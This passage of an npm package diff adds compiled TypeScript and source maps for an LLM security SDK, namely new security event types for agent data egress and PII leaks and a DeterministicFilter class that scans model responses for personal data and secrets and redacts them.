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"}

package/dist/domain/events/SecurityEventType.d.ts

@@ -6,7 +6,11 @@ export declare enum SecurityEventType {
     PROMPT_INJECTION = "PROMPT_INJECTION",
     UNAUTHORIZED_TOOL = "UNAUTHORIZED_TOOL",
     PATTERN_MATCH = "PATTERN_MATCH",
-    SCHEMA_VIOLATION = "SCHEMA_VIOLATION"
+    SCHEMA_VIOLATION = "SCHEMA_VIOLATION",
+    /** Layer 1: agent attempted to exfiltrate data to an unauthorized destination */
+    SUSPICIOUS_EGRESS = "SUSPICIOUS_EGRESS",
+    /** Layer 1: agent response contained PII/secrets that were redacted before delivery */
+    PII_LEAK = "PII_LEAK"
 }
 export type SecurityEventTypeString = keyof typeof SecurityEventType;
 export declare function isSecurityEventType(value: unknown): value is SecurityEventType;

package/dist/domain/events/SecurityEventType.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"SecurityEventType.d.ts","sourceRoot":"","sources":["../../../src/domain/events/SecurityEventType.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,oBAAY,iBAAiB;IAC3B,gBAAgB,qBAAqB;IACrC,iBAAiB,sBAAsB;IACvC,aAAa,kBAAkB;IAC/B,gBAAgB,qBAAqB;CACtC;AAED,MAAM,MAAM,uBAAuB,GAAG,MAAM,OAAO,iBAAiB,CAAC;AAErE,wBAAgB,mBAAmB,CAAC,KAAK,EAAE,OAAO,GAAG,KAAK,IAAI,iBAAiB,CAE9E"}
+{"version":3,"file":"SecurityEventType.d.ts","sourceRoot":"","sources":["../../../src/domain/events/SecurityEventType.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,oBAAY,iBAAiB;IAC3B,gBAAgB,qBAAqB;IACrC,iBAAiB,sBAAsB;IACvC,aAAa,kBAAkB;IAC/B,gBAAgB,qBAAqB;IACrC,iFAAiF;IACjF,iBAAiB,sBAAsB;IACvC,uFAAuF;IACvF,QAAQ,aAAa;CACtB;AAED,MAAM,MAAM,uBAAuB,GAAG,MAAM,OAAO,iBAAiB,CAAC;AAErE,wBAAgB,mBAAmB,CAAC,KAAK,EAAE,OAAO,GAAG,KAAK,IAAI,iBAAiB,CAE9E"}

package/dist/domain/events/SecurityEventType.js

@@ -8,6 +8,10 @@ export var SecurityEventType;
     SecurityEventType["UNAUTHORIZED_TOOL"] = "UNAUTHORIZED_TOOL";
     SecurityEventType["PATTERN_MATCH"] = "PATTERN_MATCH";
     SecurityEventType["SCHEMA_VIOLATION"] = "SCHEMA_VIOLATION";
+    /** Layer 1: agent attempted to exfiltrate data to an unauthorized destination */
+    SecurityEventType["SUSPICIOUS_EGRESS"] = "SUSPICIOUS_EGRESS";
+    /** Layer 1: agent response contained PII/secrets that were redacted before delivery */
+    SecurityEventType["PII_LEAK"] = "PII_LEAK";
 })(SecurityEventType || (SecurityEventType = {}));
 export function isSecurityEventType(value) {
     return Object.values(SecurityEventType).includes(value);

package/dist/domain/events/SecurityEventType.js.map

@@ -1 +1 @@
-{"version":3,"file":"SecurityEventType.js","sourceRoot":"","sources":["../../../src/domain/events/SecurityEventType.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,MAAM,CAAN,IAAY,iBAKX;AALD,WAAY,iBAAiB;IAC3B,0DAAqC,CAAA;IACrC,4DAAuC,CAAA;IACvC,oDAA+B,CAAA;IAC/B,0DAAqC,CAAA;AACvC,CAAC,EALW,iBAAiB,KAAjB,iBAAiB,QAK5B;AAID,MAAM,UAAU,mBAAmB,CAAC,KAAc;IAChD,OAAO,MAAM,CAAC,MAAM,CAAC,iBAAiB,CAAC,CAAC,QAAQ,CAAC,KAA0B,CAAC,CAAC;AAC/E,CAAC"}
+{"version":3,"file":"SecurityEventType.js","sourceRoot":"","sources":["../../../src/domain/events/SecurityEventType.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,MAAM,CAAN,IAAY,iBASX;AATD,WAAY,iBAAiB;IAC3B,0DAAqC,CAAA;IACrC,4DAAuC,CAAA;IACvC,oDAA+B,CAAA;IAC/B,0DAAqC,CAAA;IACrC,iFAAiF;IACjF,4DAAuC,CAAA;IACvC,uFAAuF;IACvF,0CAAqB,CAAA;AACvB,CAAC,EATW,iBAAiB,KAAjB,iBAAiB,QAS5B;AAID,MAAM,UAAU,mBAAmB,CAAC,KAAc;IAChD,OAAO,MAAM,CAAC,MAAM,CAAC,iBAAiB,CAAC,CAAC,QAAQ,CAAC,KAA0B,CAAC,CAAC;AAC/E,CAAC"}

package/dist/domain/pii/DeterministicFilter.d.ts

@@ -0,0 +1,79 @@
+/**
+ * Deterministic Filter
+ * Domain service: Layer 1 outbound intelligent gatekeeper.
+ *
+ * Philosophy — The SDK is a HIGH-PRECISION SENSOR, not a policy enforcer.
+ *
+ * Every match is surfaced as a SuspiciousTrace. The developer owns the reaction:
+ *
+ *   const trace = tracerney.validate(agentOutput);
+ *
+ *   if (trace.isSuspicious) {
+ *     console.log(`Alert: ${trace.reason}`);
+ *
+ *     // Option A: Hard Block
+ *     // throw new Error("Security Policy Violation");
+ *
+ *     // Option B: Surgical Scrub
+ *     // return trace.redactedContent;
+ *   }
+ *
+ * See the "Suspicious Manifest" in PIIPattern.ts for the label-to-action guide.
+ *
+ * Pure synchronous — no I/O, no async. Target latency <5ms.
+ */
+import { type PIICategory, type PIIPattern, type SuspiciousLabel } from "./PIIPattern";
+import type { LLMResponse } from "../../application/ports/ILLMProvider";
+export type { SuspiciousLabel };
+export interface PIIFinding {
+    readonly patternId: string;
+    readonly patternName: string;
+    readonly category: PIICategory;
+    /** Semantic label — use this for routing decisions */
+    readonly label: SuspiciousLabel;
+    /** How many times this pattern matched */
+    readonly count: number;
+}
+/**
+ * The result of a single validate() call.
+ *
+ * isSuspicious    — true if any pattern fired; false means clean.
+ * label           — highest-severity label across all findings (null when clean).
+ * reason          — human-readable summary for logging, e.g. "Detected 2 finding(s): Email Address, AWS Access Key ID"
+ * redactedContent — pre-computed version of the input with all matches replaced.
+ *                   Present regardless of isSuspicious (equals original text when clean).
+ *                   Use it if you want surgical scrubbing. Throw if you want a hard block.
+ * findings        — granular list for detailed logging or telemetry.
+ */
+export interface SuspiciousTrace {
+    readonly isSuspicious: boolean;
+    readonly label: SuspiciousLabel | null;
+    readonly reason: string;
+    readonly redactedContent: string;
+    readonly findings: readonly PIIFinding[];
+}
+/** @internal Used by ShieldApplicationService.wrap() */
+export interface FilterOutcome {
+    readonly trace: SuspiciousTrace;
+    /** Response with redactedContent applied to all choice messages */
+    readonly redactedResponse?: unknown;
+}
+export declare class DeterministicFilter {
+    private readonly patterns;
+    constructor(patterns?: readonly PIIPattern[]);
+    /**
+     * Scan a plain string and return a SuspiciousTrace.
+     * Always returns — never throws. The caller decides what to do.
+     */
+    validate(text: string): SuspiciousTrace;
+    /**
+     * Scan all text content in an LLMResponse.
+     * Returns a merged SuspiciousTrace (highest label across all choices)
+     * and a new response with redactedContent applied — never mutates the original.
+     */
+    filterResponse<T extends LLMResponse>(response: T): {
+        response: T;
+        outcome: FilterOutcome;
+    };
+}
+//# sourceMappingURL=DeterministicFilter.d.ts.map

package/dist/domain/pii/DeterministicFilter.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"DeterministicFilter.d.ts","sourceRoot":"","sources":["../../../src/domain/pii/DeterministicFilter.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;;;;;GAuBG;AAEH,OAAO,EAIL,KAAK,WAAW,EAChB,KAAK,UAAU,EACf,KAAK,eAAe,EACrB,MAAM,cAAc,CAAC;AACtB,OAAO,KAAK,EAAE,WAAW,EAAa,MAAM,sCAAsC,CAAC;AAInF,YAAY,EAAE,eAAe,EAAE,CAAC;AAEhC,MAAM,WAAW,UAAU;IACzB,QAAQ,CAAC,SAAS,EAAE,MAAM,CAAC;IAC3B,QAAQ,CAAC,WAAW,EAAE,MAAM,CAAC;IAC7B,QAAQ,CAAC,QAAQ,EAAE,WAAW,CAAC;IAC/B,sDAAsD;IACtD,QAAQ,CAAC,KAAK,EAAE,eAAe,CAAC;IAChC,0CAA0C;IAC1C,QAAQ,CAAC,KAAK,EAAE,MAAM,CAAC;CACxB;AAED;;;;;;;;;;GAUG;AACH,MAAM,WAAW,eAAe;IAC9B,QAAQ,CAAC,YAAY,EAAE,OAAO,CAAC;IAC/B,QAAQ,CAAC,KAAK,EAAE,eAAe,GAAG,IAAI,CAAC;IACvC,QAAQ,CAAC,MAAM,EAAE,MAAM,CAAC;IACxB,QAAQ,CAAC,eAAe,EAAE,MAAM,CAAC;IACjC,QAAQ,CAAC,QAAQ,EAAE,SAAS,UAAU,EAAE,CAAC;CAC1C;AAED,wDAAwD;AACxD,MAAM,WAAW,aAAa;IAC5B,QAAQ,CAAC,KAAK,EAAE,eAAe,CAAC;IAChC,mEAAmE;IACnE,QAAQ,CAAC,gBAAgB,CAAC,EAAE,OAAO,CAAC;CACrC;AAID,qBAAa,mBAAmB;IAC9B,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAwB;gBAErC,QAAQ,GAAE,SAAS,UAAU,EAAiB;IAI1D;;;OAGG;IACH,QAAQ,CAAC,IAAI,EAAE,MAAM,GAAG,eAAe;IAyDvC;;;;OAIG;IACH,cAAc,CAAC,CAAC,SAAS,WAAW,EAAE,QAAQ,EAAE,CAAC,GAAG;QAClD,QAAQ,EAAE,CAAC,CAAC;QACZ,OAAO,EAAE,aAAa,CAAC;KACxB;CAoEF"}

package/dist/domain/pii/DeterministicFilter.js

@@ -0,0 +1,151 @@
+/**
+ * Deterministic Filter
+ * Domain service: Layer 1 outbound intelligent gatekeeper.
+ *
+ * Philosophy — The SDK is a HIGH-PRECISION SENSOR, not a policy enforcer.
+ *
+ * Every match is surfaced as a SuspiciousTrace. The developer owns the reaction:
+ *
+ *   const trace = tracerney.validate(agentOutput);
+ *
+ *   if (trace.isSuspicious) {
+ *     console.log(`Alert: ${trace.reason}`);
+ *
+ *     // Option A: Hard Block
+ *     // throw new Error("Security Policy Violation");
+ *
+ *     // Option B: Surgical Scrub
+ *     // return trace.redactedContent;
+ *   }
+ *
+ * See the "Suspicious Manifest" in PIIPattern.ts for the label-to-action guide.
+ *
+ * Pure synchronous — no I/O, no async. Target latency <5ms.
+ */
+import { PII_PATTERNS, CATEGORY_TO_LABEL, LABEL_PRIORITY, } from './PIIPattern.js';
+// ─── Service ──────────────────────────────────────────────────────────────────
+export class DeterministicFilter {
+    constructor(patterns = PII_PATTERNS) {
+        this.patterns = patterns;
+    }
+    /**
+     * Scan a plain string and return a SuspiciousTrace.
+     * Always returns — never throws. The caller decides what to do.
+     */
+    validate(text) {
+        if (!text || typeof text !== "string") {
+            return {
+                isSuspicious: false,
+                label: null,
+                reason: "Clean",
+                redactedContent: text ?? "",
+                findings: [],
+            };
+        }
+        let redacted = text;
+        const findings = [];
+        for (const p of this.patterns) {
+            p.pattern.lastIndex = 0;
+            const matches = redacted.match(p.pattern);
+            if (!matches || matches.length === 0)
+                continue;
+            p.pattern.lastIndex = 0;
+            redacted = redacted.replace(p.pattern, p.redactAs);
+            findings.push({
+                patternId: p.id,
+                patternName: p.name,
+                category: p.category,
+                label: CATEGORY_TO_LABEL[p.category],
+                count: matches.length,
+            });
+        }
+        if (findings.length === 0) {
+            return {
+                isSuspicious: false,
+                label: null,
+                reason: "Clean",
+                redactedContent: text,
+                findings: [],
+            };
+        }
+        // Derive the highest-severity label across all findings
+        const dominantLabel = findings.reduce((best, f) => {
+            return LABEL_PRIORITY[f.label] > LABEL_PRIORITY[best] ? f.label : best;
+        }, findings[0].label);
+        const reason = `Detected ${findings.length} finding(s): ${findings.map((f) => f.patternName).join(", ")}`;
+        return {
+            isSuspicious: true,
+            label: dominantLabel,
+            reason,
+            redactedContent: redacted,
+            findings,
+        };
+    }
+    /**
+     * Scan all text content in an LLMResponse.
+     * Returns a merged SuspiciousTrace (highest label across all choices)
+     * and a new response with redactedContent applied — never mutates the original.
+     */
+    filterResponse(response) {
+        if (!response?.choices?.length) {
+            const cleanTrace = {
+                isSuspicious: false,
+                label: null,
+                reason: "Clean",
+                redactedContent: "",
+                findings: [],
+            };
+            return { response, outcome: { trace: cleanTrace } };
+        }
+        const allFindings = [];
+        let anyRedacted = false;
+        const sanitizedChoices = [];
+        for (const choice of response.choices) {
+            const content = choice.message?.content;
+            if (!content) {
+                sanitizedChoices.push(choice);
+                continue;
+            }
+            const trace = this.validate(content);
+            if (trace.isSuspicious) {
+                anyRedacted = true;
+                allFindings.push(...trace.findings);
+                sanitizedChoices.push({
+                    ...choice,
+                    message: { ...choice.message, content: trace.redactedContent },
+                });
+            }
+            else {
+                sanitizedChoices.push(choice);
+            }
+        }
+        const sanitizedResponse = anyRedacted
+            ? { ...response, choices: sanitizedChoices }
+            : response;
+        if (allFindings.length === 0) {
+            const cleanTrace = {
+                isSuspicious: false,
+                label: null,
+                reason: "Clean",
+                redactedContent: "",
+                findings: [],
+            };
+            return { response: sanitizedResponse, outcome: { trace: cleanTrace } };
+        }
+        const dominantLabel = allFindings.reduce((best, f) => {
+            return LABEL_PRIORITY[f.label] > LABEL_PRIORITY[best] ? f.label : best;
+        }, allFindings[0].label);
+        const mergedTrace = {
+            isSuspicious: true,
+            label: dominantLabel,
+            reason: `Detected ${allFindings.length} finding(s): ${allFindings.map((f) => f.patternName).join(", ")}`,
+            redactedContent: "",
+            findings: allFindings,
+        };
+        return {
+            response: sanitizedResponse,
+            outcome: { trace: mergedTrace, redactedResponse: sanitizedResponse },
+        };
+    }
+}
+//# sourceMappingURL=DeterministicFilter.js.map

package/dist/domain/pii/DeterministicFilter.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"DeterministicFilter.js","sourceRoot":"","sources":["../../../src/domain/pii/DeterministicFilter.ts"],"names":[],"mappings":"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